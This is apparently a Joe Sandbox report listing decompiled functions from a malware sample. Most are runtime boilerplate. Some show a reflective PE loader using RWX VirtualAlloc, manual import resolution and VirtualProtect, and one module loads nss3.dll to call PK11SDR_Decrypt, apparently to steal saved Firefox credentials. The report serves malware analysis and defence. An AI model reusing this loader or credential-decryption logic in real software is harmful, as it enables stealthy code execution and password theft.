    				signed int _t8;
    				void* _t15;
    				void* _t20;
    				intOrPtr* _t22;
    				void* _t23;
    				signed int _t24;
    
    				_t20 = __edi;
    				_t15 = __ebx;
    				_push(__ecx);
    				_t8 =  *0x1347004; // 0x262637d3
    				_v8 = _t8 ^ _t24;
    				_t22 = E0133A66E(0x14, "InitializeCriticalSectionEx", 0x1341774, 0x134177c);
    				if(_t22 == 0) {
    					InitializeCriticalSectionAndSpinCount(_a4, _a8); // executed
    				} else {
    					 *0x1340140(_a4, _a8, _a12);
    					 *_t22();
    				}
    				_pop(_t23);
    				return E01333E82(_t15, _v8 ^ _t24, _t20, _t23);
    			}

    APIs
      • Part of subcall function 0133A66E: GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,0133A8AE,00000006,FlsSetValue,01341750,01341758,00000000,00000364,?,013395EA,00000000), ref: 0133A6CE
    • InitializeCriticalSectionAndSpinCount.KERNELBASE(?,?,01338FC5), ref: 0133A92B
      • Part of subcall function 01333E82: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0133412E
    Strings
    • InitializeCriticalSectionEx, xrefs: 0133A8FB
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    APIs
      • Part of subcall function 10086D1C: GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,10086FD0,00000006,FlsSetValue,10091338,10091340,00000000,00000364,?,10086C85,00000000), ref: 10086D7C
    • InitializeCriticalSectionAndSpinCount.KERNELBASE(?,?), ref: 1008704D
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    Strings
    • InitializeCriticalSectionEx, xrefs: 1008701D
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    C-Code - Quality: 16%
    			E0133A785(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4) {
    				signed int _v8;
    				void* __esi;
    				signed int _t4;
    				intOrPtr* _t6;
    				void* _t11;
    				void* _t16;
    				intOrPtr* _t18;
    				void* _t19;
    				signed int _t20;
    
    				_t16 = __edi;
    				_t11 = __ebx;
    				_push(__ecx);
    				_t4 =  *0x1347004; // 0x262637d3
    				_v8 = _t4 ^ _t20;
    				_t6 = E0133A66E(3, "FlsAlloc", 0x1341738, 0x1341740); // executed
    				_t18 = _t6;
    				if(_t18 == 0) {
    					TlsAlloc();
    				} else {
    					 *0x1340140(_a4);
    					 *_t18();
    				}
    				_pop(_t19);
    				return E01333E82(_t11, _v8 ^ _t20, _t16, _t19);
    			}

    APIs
      • Part of subcall function 0133A66E: GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,0133A8AE,00000006,FlsSetValue,01341750,01341758,00000000,00000364,?,013395EA,00000000), ref: 0133A6CE
    • TlsAlloc.KERNEL32 ref: 0133A7C4
      • Part of subcall function 01333E82: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0133412E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    APIs
      • Part of subcall function 10086D1C: GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,10086FD0,00000006,FlsSetValue,10091338,10091340,00000000,00000364,?,10086C85,00000000), ref: 10086D7C
    • TlsAlloc.KERNEL32 ref: 10086EE6
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    C-Code - Quality: 68%
    			E01336CA2(void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
    				intOrPtr* _t6;
    				intOrPtr* _t10;
    
    				_t6 = E01336A96(8, "InitializeCriticalSectionEx", 0x1340360, "InitializeCriticalSectionEx"); // executed
    				_t10 = _t6;
    				if(_t10 == 0) {
    					return InitializeCriticalSectionAndSpinCount(_a4, _a8);
    				}
    				L0133489C();
    				return  *_t10(_a4, _a8, _a12);
    			}

    APIs
      • Part of subcall function 01336A96: GetProcAddress.KERNEL32(00000000,?,01347C08,00000000,?,?,01336CBC,00000008,InitializeCriticalSectionEx,01340360,InitializeCriticalSectionEx,00000000,?,01336A24,01347C08,00000FA0), ref: 01336AFA
    • InitializeCriticalSectionAndSpinCount.KERNEL32(00000000,?), ref: 01336CDF
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    APIs
    • RtlAllocateHeap.NTDLL(00000008,?), ref: 100044AF
    Strings
    • failed to allocate %u bytes of memory, xrefs: 100044BE
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    C-Code - Quality: 90%
    			E0133A35C(void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
    				signed int _v8;
    				char _v22;
    				struct _cpinfo _v28;
    				signed int _v32;
    				signed int _v36;
    				void* __ebx;
    				void* __esi;
    				signed int _t48;
    				int _t51;
    				signed int _t54;
    				signed int _t55;
    				short _t58;
    				signed char _t62;
    				signed int _t63;
    				signed char* _t72;
    				signed char* _t73;
    				int _t77;
    				signed int _t80;
    				signed char* _t81;
    				short* _t82;
    				int _t86;
    				signed char _t87;
    				signed int _t88;
    				signed int _t90;
    				signed int _t91;
    				int _t93;
    				int _t94;
    				intOrPtr _t96;
    				signed int _t97;
    
    				_t92 = __edi;
    				_t48 =  *0x1347004; // 0x262637d3
    				_v8 = _t48 ^ _t97;
    				_t96 = _a8;
    				_t77 = E01339F2F(__eflags, _a4);
    				if(_t77 != 0) {
    					_push(__edi);
    					_t93 = 0;
    					__eflags = 0;
    					_t80 = 0;
    					_t51 = 0;
    					_v32 = 0;
    					while(1) {
    						__eflags =  *((intOrPtr*)(_t51 + 0x13471c8)) - _t77;
    						if( *((intOrPtr*)(_t51 + 0x13471c8)) == _t77) {
    							break;
    						}
    						_t80 = _t80 + 1;
    						_t51 = _t51 + 0x30;
    						_v32 = _t80;
    						__eflags = _t51 - 0xf0;
    						if(_t51 < 0xf0) {
    							continue;
    						} else {
    							__eflags = _t77 - 0xfde8;
    							if(_t77 == 0xfde8) {
    								L23:
    							} else {
    								__eflags = _t77 - 0xfde9;
    								if(_t77 == 0xfde9) {
    									goto L23;
    								} else {
    									_t51 = IsValidCodePage(_t77 & 0x0000ffff);
    									__eflags = _t51;
    									if(_t51 == 0) {
    										goto L23;
    									} else {
    										_t51 = GetCPInfo(_t77,  &_v28);
    										__eflags = _t51;
    										if(_t51 == 0) {
    											__eflags =  *0x134825c - _t93; // 0x0
    											if(__eflags == 0) {
    												goto L23;
    											} else {
    												E01339FA2(_t96);
    												goto L37;
    											}
    										} else {
    											E01336200(_t93, _t96 + 0x18, _t93, 0x101);
    											 *(_t96 + 4) = _t77;
    											 *(_t96 + 0x21c) = _t93;
    											_t77 = 1;
    											__eflags = _v28 - 1;
    											if(_v28 <= 1) {
    												 *(_t96 + 8) = _t93;
    											} else {
    												__eflags = _v22;
    												_t72 =  &_v22;
    												if(_v22 != 0) {
    													while(1) {
    														_t87 = _t72[1];
    														__eflags = _t87;
    														if(_t87 == 0) {
    															goto L16;
    														}
    														_t90 = _t87 & 0x000000ff;
    														_t88 =  *_t72 & 0x000000ff;
    														while(1) {
    															__eflags = _t88 - _t90;
    															if(_t88 > _t90) {
    																break;
    															}
    															 *(_t96 + _t88 + 0x19) =  *(_t96 + _t88 + 0x19) | 0x00000004;
    															_t88 = _t88 + 1;
    															__eflags = _t88;
    														}
    														_t72 =  &(_t72[2]);
    														__eflags =  *_t72;
    														if( *_t72 != 0) {
    															continue;
    														}
    														goto L16;
    													}
    												}
    												L16:
    												_t73 = _t96 + 0x1a;
    												_t86 = 0xfe;
    												do {
    													 *_t73 =  *_t73 | 0x00000008;
    													_t73 =  &(_t73[1]);
    													_t86 = _t86 - 1;
    													__eflags = _t86;
    												} while (_t86 != 0);
    												 *(_t96 + 0x21c) = E01339EF1( *(_t96 + 4));
    												 *(_t96 + 8) = _t77;
    											}
    											asm("stosd");
    											asm("stosd");
    											asm("stosd");
    											L36:
    											E0133A007(_t90, _t96); // executed
    											L37:
    											__eflags = 0;
    										}
    									}
    								}
    							}
    						}
    						_pop(_t92);
    						goto L39;
    					}
    					E01336200(_t93, _t96 + 0x18, _t93, 0x101);
    					_t54 = _v32 * 0x30;
    					__eflags = _t54;
    					_v36 = _t54;
    					_t55 = _t54 + 0x13471d8;
    					_v32 = _t55;
    					do {
    						__eflags =  *_t55;
    						_t81 = _t55;
    						if( *_t55 != 0) {
    							while(1) {
    								_t62 = _t81[1];
    								__eflags = _t62;
    								if(_t62 == 0) {
    									break;
    								}
    								_t91 =  *_t81 & 0x000000ff;
    								_t63 = _t62 & 0x000000ff;
    								while(1) {
    									__eflags = _t91 - _t63;
    									if(_t91 > _t63) {
    										break;
    									}
    									__eflags = _t91 - 0x100;
    									if(_t91 < 0x100) {
    										_t31 = _t93 + 0x13471c4; // 0x8040201
    										 *(_t96 + _t91 + 0x19) =  *(_t96 + _t91 + 0x19) |  *_t31;
    										_t91 = _t91 + 1;
    										__eflags = _t91;
    										_t63 = _t81[1] & 0x000000ff;
    										continue;
    									}
    									break;
    								}
    								_t81 =  &(_t81[2]);
    								__eflags =  *_t81;
    								if( *_t81 != 0) {
    									continue;
    								}
    								break;
    							}
    							_t55 = _v32;
    						}
    						_t93 = _t93 + 1;
    						_t55 = _t55 + 8;
    						_v32 = _t55;
    						__eflags = _t93 - 4;
    					} while (_t93 < 4);
    					 *(_t96 + 4) = _t77;
    					 *(_t96 + 8) = 1;
    					 *(_t96 + 0x21c) = E01339EF1(_t77);
    					_t82 = _t96 + 0xc;
    					_t90 = _v36 + 0x13471cc;
    					_t94 = 6;
    					do {
    						_t58 =  *_t90;
    						_t90 = _t90 + 2;
    						 *_t82 = _t58;
    						_t82 = _t82 + 2;
    						_t94 = _t94 - 1;
    						__eflags = _t94;
    					} while (_t94 != 0);
    					goto L36;
    				} else {
    					E01339FA2(_t96);
    				}
    				L39:
    				return E01333E82(_t77, _v8 ^ _t97, _t92, _t96);
    			}

    APIs
      • Part of subcall function 01339F2F: GetOEMCP.KERNEL32(00000000), ref: 01339F5A
      • Part of subcall function 01339F2F: GetACP.KERNEL32(00000000), ref: 01339F71
    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0133A1FD,?,00000000), ref: 0133A3D0
    • GetCPInfo.KERNEL32(00000000,0133A1FD,?,?,?,0133A1FD,?,00000000), ref: 0133A3E3
      • Part of subcall function 0133A007: GetCPInfo.KERNEL32(?,?), ref: 0133A02C
      • Part of subcall function 01333E82: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0133412E
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    APIs
      • Part of subcall function 10088A93: GetOEMCP.KERNEL32(00000000,?,?,10088D1C,?), ref: 10088ABE
      • Part of subcall function 10088A93: GetACP.KERNEL32(00000000,?,?,10088D1C,?), ref: 10088AD5
    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10088D61,?,00000000), ref: 10088F34
    • GetCPInfo.KERNEL32(00000000,10088D61,?,?,?,10088D61,?,00000000), ref: 10088F47
      • Part of subcall function 10088B6B: GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10088B90
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    C-Code - Quality: 84%
    			E01332520(void* __ecx) {
    				intOrPtr* _v8;
    				intOrPtr _v12;
    				struct HINSTANCE__* _v16;
    				intOrPtr _t33;
    				struct HINSTANCE__* _t38;
    				signed int _t40;
    				signed short _t42;
    				CHAR* _t43;
    				_Unknown_base(*)()* _t44;
    				intOrPtr _t45;
    				signed int _t47;
    				void* _t53;
    				intOrPtr* _t56;
    				intOrPtr _t57;
    				intOrPtr* _t58;
    				intOrPtr _t59;
    				intOrPtr _t64;
    				intOrPtr _t68;
    				signed short* _t70;
    				struct HINSTANCE__* _t75;
    				signed short* _t77;
    				void* _t80;
    				void* _t81;
    				signed short _t93;
    
    				_t53 = __ecx;
    				_t33 =  *((intOrPtr*)(__ecx + 0xc0));
    				if(_t33 == 0 ||  *((intOrPtr*)(__ecx + 0xc4)) == 0) {
    					return 0;
    				} else {
    					_t56 =  *((intOrPtr*)(__ecx + 0x144)) + _t33;
    					_v8 = _t56;
    					_t57 =  *((intOrPtr*)(_t56 + 0xc));
    					if(_t57 == 0) {
    						L25:
    						return 0;
    					} else {
    						while(1) {
    							_t38 = LoadLibraryA( *((intOrPtr*)(_t53 + 0x144)) + _t57); // executed
    							_t75 = _t38;
    							_v16 = _t75;
    							if(_t75 == 0) {
    								break;
    							}
    							_t40 =  *(_t53 + 0x154);
    							if( *(_t53 + 0x150) < _t40) {
    								_t68 = _v12;
    								goto L14;
    							} else {
    								if(_t40 == 0) {
    									_t47 = 0x10;
    								} else {
    									_t47 = _t40 + _t40;
    								}
    								 *(_t53 + 0x154) = _t47;
    								_push(_t47 << 2);
    								_t68 = E01336EBC(_t57);
    								_t81 = _t80 + 4;
    								_v12 = _t68;
    								if(_t68 == 0) {
    									return 3;
    								} else {
    									_t62 =  *(_t53 + 0x150);
    									if( *(_t53 + 0x150) != 0) {
    										E0133F490(_t68,  *((intOrPtr*)(_t53 + 0x14c)), _t62 << 2);
    										_t81 = _t81 + 0xc;
    									}
    									E01336EB7( *((intOrPtr*)(_t53 + 0x14c)));
    									_t80 = _t81 + 4;
    									 *((intOrPtr*)(_t53 + 0x14c)) = _t68;
    									L14:
    									_t58 = _v8;
    									 *(_t68 +  *(_t53 + 0x150) * 4) = _t75;
    									 *(_t53 + 0x150) =  *(_t53 + 0x150) + 1;
    									_t64 =  *((intOrPtr*)(_t53 + 0x144));
    									_t70 =  *((intOrPtr*)(_t58 + 0x10)) + _t64;
    									_t77 = _t70;
    									if( *((intOrPtr*)(_t58 + 4)) == 0) {
    										L17:
    										_t42 =  *_t77;
    										_t93 = _t42;
    										if(_t93 == 0) {
    											L24:
    											_t59 = _t58 + 0x14;
    											_v8 = _t59;
    											_t57 =  *((intOrPtr*)(_t59 + 0xc));
    											if(_t57 != 0) {
    												continue;
    											} else {
    												goto L25;
    											}
    										} else {
    											L18:
    											L18:
    											if(_t93 >= 0) {
    												_t43 = _t42 +  *((intOrPtr*)(_t53 + 0x144)) + 2;
    											} else {
    												_t43 = _t42 & 0x0000ffff;
    											}
    											_t44 = GetProcAddress(_v16, _t43);
    											 *_t70 = _t44;
    											if(_t44 == 0) {
    												break;
    											}
    											_t42 = _t77[2];
    											_t77 =  &(_t77[2]);
    											_t70 =  &(_t70[2]);
    											if(_t42 != 0) {
    												goto L18;
    											} else {
    												_t58 = _v8;
    												goto L24;
    											}
    										}
    									} else {
    										_t45 =  *_t58;
    										if(_t45 == 0) {
    											return 8;
    										} else {
    											_t77 = _t45 + _t64;
    											goto L17;
    										}
    									}
    								}
    							}
    							goto L30;
    						}
    						return 6;
    					}
    				}
    				L30:
    			}

    APIs
    • LoadLibraryA.KERNEL32(?), ref: 01332569
    • GetProcAddress.KERNEL32(?,?), ref: 01332636
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    C-Code - Quality: 77%
    			E01332800(void* __edx, intOrPtr* _a8) {
    				intOrPtr _v8;
    				signed int _v12;
    				char _v20;
    				intOrPtr _v28;
    				signed int _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				intOrPtr _v52;
    				intOrPtr _v56;
    				intOrPtr _v68;
    				intOrPtr _v196;
    				char _v380;
    				intOrPtr _v384;
    				intOrPtr* _v388;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				signed int _t45;
    				signed int _t46;
    				void* _t48;
    				void* _t49;
    				void* _t54;
    				void* _t56;
    				void* _t57;
    				intOrPtr _t58;
    				void* _t69;
    				void* _t70;
    				char* _t72;
    				void* _t85;
    				intOrPtr* _t87;
    				void* _t88;
    				signed int _t89;
    				void* _t90;
    				intOrPtr _t91;
    				void* _t92;
    
    				_push(0xfffffffe);
    				_push(0x1345a68);
    				_push(E01335F20);
    				_push( *[fs:0x0]);
    				_t91 = _t90 - 0x174;
    				_t45 =  *0x1347004; // 0x262637d3
    				_v12 = _v12 ^ _t45;
    				_t46 = _t45 ^ _t89;
    				_v32 = _t46;
    				_push(_t46);
    				 *[fs:0x0] =  &_v20;
    				_v28 = _t91;
    				_t69 = __edx;
    				_t87 = _a8;
    				_v388 = _t87;
    				_v384 = 0;
    				_v68 = 0;
    				_v48 = 0;
    				_v40 = 0;
    				_v44 = 0;
    				_v36 = 0;
    				_v8 = 0;
    				_v8 = 1;
    				_t48 = E01332050( &_v380, __edx);
    				_t92 = _t91 + 4;
    				if(_t48 == 0) {
    					_t72 =  &_v380;
    					_t49 = E01332200(_t72); // executed
    					if(_t49 != 0) {
    						goto L1;
    					} else {
    						_v8 = 2;
    						_push(_t72);
    						_t54 = E013322C0( &_v380, _t69);
    						_t92 = _t92 + 8;
    						if(_t54 != 0 || E013323E0( &_v380) != 0) {
    							goto L1;
    						} else {
    							_t56 = E01332520( &_v380); // executed
    							if(_t56 != 0) {
    								goto L1;
    							} else {
    								_t57 = E013326A0( &_v380); // executed
    								if(_t57 != 0) {
    									goto L1;
    								} else {
    									_t58 = E01332760( &_v380); // executed
    									if(_t58 != 0) {
    										goto L1;
    									} else {
    										if(_t87 != 0) {
    											_v8 = 3;
    											 *_t87 = 0x20;
    											 *((intOrPtr*)(_t87 + 4)) = _t58;
    											 *((intOrPtr*)(_t87 + 8)) = _v56;
    											 *((intOrPtr*)(_t87 + 0xc)) = _v52;
    											 *((intOrPtr*)(_t87 + 0x10)) = _v36;
    											 *((intOrPtr*)(_t87 + 0x14)) = _v196;
    											 *((intOrPtr*)(_t87 + 0x18)) = _v48;
    											 *((intOrPtr*)(_t87 + 0x1c)) = _v44;
    											_v8 = 2;
    										}
    										_v384 = 1;
    										E013368B0(_t89, 0x1347004,  &_v20, 0xfffffffe);
    									}
    								}
    							}
    						}
    					}
    				} else {
    					L1:
    					E013368B0(_t89, 0x1347004,  &_v20, 0xfffffffe);
    				}
    				 *[fs:0x0] = _v20;
    				_pop(_t85);
    				_pop(_t88);
    				_pop(_t70);
    				return E01333E82(_t70, _v32 ^ _t89, _t85, _t88);
    			}

    APIs
      • Part of subcall function 01332200: VirtualAlloc.KERNELBASE(?,00000000,00003000,00000040), ref: 01332256
      • Part of subcall function 01332200: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 0133228B
      • Part of subcall function 01332520: LoadLibraryA.KERNEL32(?), ref: 01332569
      • Part of subcall function 01332520: GetProcAddress.KERNEL32(?,?), ref: 01332636
      • Part of subcall function 013326A0: VirtualProtect.KERNELBASE(?,?,00000002,?), ref: 01332714
    • @_EH4_CallFilterFunc@8.NTDLLP ref: 0133297B
    • @_EH4_CallFilterFunc@8.NTDLLP ref: 0133289F
      • Part of subcall function 01333E82: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0133412E
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    APIs
    • lstrlenA.KERNEL32(?,00000000,00000000,10001CC5,00000000), ref: 10001677
    • SetCurrentDirectoryA.KERNELBASE(00000000), ref: 10001691
      • Part of subcall function 100015B0: LoadLibraryA.KERNEL32(nss3.dll), ref: 100015B6
      • Part of subcall function 100015B0: GetProcAddress.KERNEL32(00000000,NSS_Init,?), ref: 100015D3
      • Part of subcall function 100015B0: GetProcAddress.KERNEL32(00000000,NSSBase64_DecodeBuffer), ref: 100015E0
      • Part of subcall function 100015B0: GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 100015ED
      • Part of subcall function 100015B0: GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 100015FA
      • Part of subcall function 100015B0: GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 10001607
      • Part of subcall function 100015B0: GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 10001614
      • Part of subcall function 100015B0: GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 10001621
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    C-Code - Quality: 100%
    			E0133A61E(void* __ecx) {
    				void* _t6;
    				void* _t14;
    				void* _t18;
    				WCHAR* _t19;
    
    				_t14 = __ecx;
    				_t19 = GetEnvironmentStringsW();
    				if(_t19 != 0) {
    					_t12 = (E0133A5E7(_t19) - _t19 >> 1) + (E0133A5E7(_t19) - _t19 >> 1);
    					_t6 = E0133883E(_t14, (E0133A5E7(_t19) - _t19 >> 1) + (E0133A5E7(_t19) - _t19 >> 1)); // executed
    					_t18 = _t6;
    					if(_t18 != 0) {
    						E0133F490(_t18, _t19, _t12);
    					}
    					E01338804(0);
    					FreeEnvironmentStringsW(_t19);
    				} else {
    					_t18 = 0;
    				}
    				return _t18;
    			}

    APIs
    • GetEnvironmentStringsW.KERNEL32 ref: 0133A622
      • Part of subcall function 0133883E: RtlAllocateHeap.NTDLL(00000000,01332133,?,?,01332133,?), ref: 01338870
      • Part of subcall function 01338804: HeapFree.KERNEL32(00000000,00000000), ref: 0133881A
      • Part of subcall function 01338804: GetLastError.KERNEL32(?,?,0133AF4C,?,00000000,?,00000000,?,0133AF73,?,00000007,?,?,0133B3D5,?,?), ref: 0133882C
    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0133A662
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    C-Code - Quality: 100%
    			E01333570(long __ecx, void** __edx) {
    				void* _t4;
    				void* _t8;
    				void** _t9;
    
    				_t8 = __ecx;
    				_t9 = __edx;
    				if(__ecx == 0 || __edx == 0) {
    					L4:
    					return 0;
    				} else {
    					_t4 = RtlAllocateHeap(GetProcessHeap(), 8, __ecx); // executed
    					if(_t4 == 0) {
    						goto L4;
    					} else {
    						_t9[1] = _t8;
    						 *_t9 = _t4;
    						return 1;
    					}
    				}
    			}

    APIs
    • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,01333808), ref: 01333581
    • RtlAllocateHeap.NTDLL(00000000), ref: 01333588
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    APIs
    • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,10082C5D,?,00000001,?,?,00000001,?,?,00000001,?,1009E360,0000000C), ref: 100825E2
    • CoInitialize.OLE32(00000000), ref: 100825EF
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    C-Code - Quality: 96%
    			E01332200(intOrPtr __ecx) {
    				intOrPtr _v8;
    				signed int _t16;
    				void* _t19;
    				void* _t22;
    				intOrPtr _t25;
    				intOrPtr _t28;
    				signed int _t31;
    				intOrPtr _t33;
    				intOrPtr* _t36;
    				intOrPtr _t38;
    				void* _t40;
    				void* _t44;
    				long _t45;
    
    				_push(__ecx);
    				_t28 = __ecx;
    				_t40 = 0;
    				_v8 = __ecx;
    				_t16 =  *(__ecx + 0x46) & 0x0000ffff;
    				_t44 = 0;
    				_t33 =  *((intOrPtr*)(__ecx + 0x138));
    				if(0 < _t16) {
    					_t36 = _t33 + 0xc;
    					_t31 = _t16;
    					do {
    						_t38 =  *((intOrPtr*)(_t36 - 4));
    						if(_t38 != 0) {
    							_t25 =  *_t36;
    							_t40 =  <  ? _t25 : _t40;
    							_t44 =  >  ? _t25 + _t38 : _t44;
    						}
    						_t36 = _t36 + 0x28;
    						_t31 = _t31 - 1;
    					} while (_t31 != 0);
    					_t28 = _v8;
    				}
    				_t45 = _t44 - _t40;
    				_t19 = VirtualAlloc( *((intOrPtr*)(_t28 + 0x74)) + _t40, _t45, 0x3000, 0x40); // executed
    				 *(_t28 + 0x148) = _t19;
    				 *((intOrPtr*)(_t28 + 0x144)) =  *((intOrPtr*)(_t28 + 0x74));
    				if(_t19 != 0) {
    					L10:
    					_t21 =  ==  ? 3 : 0;
    					return  ==  ? 3 : 0;
    				} else {
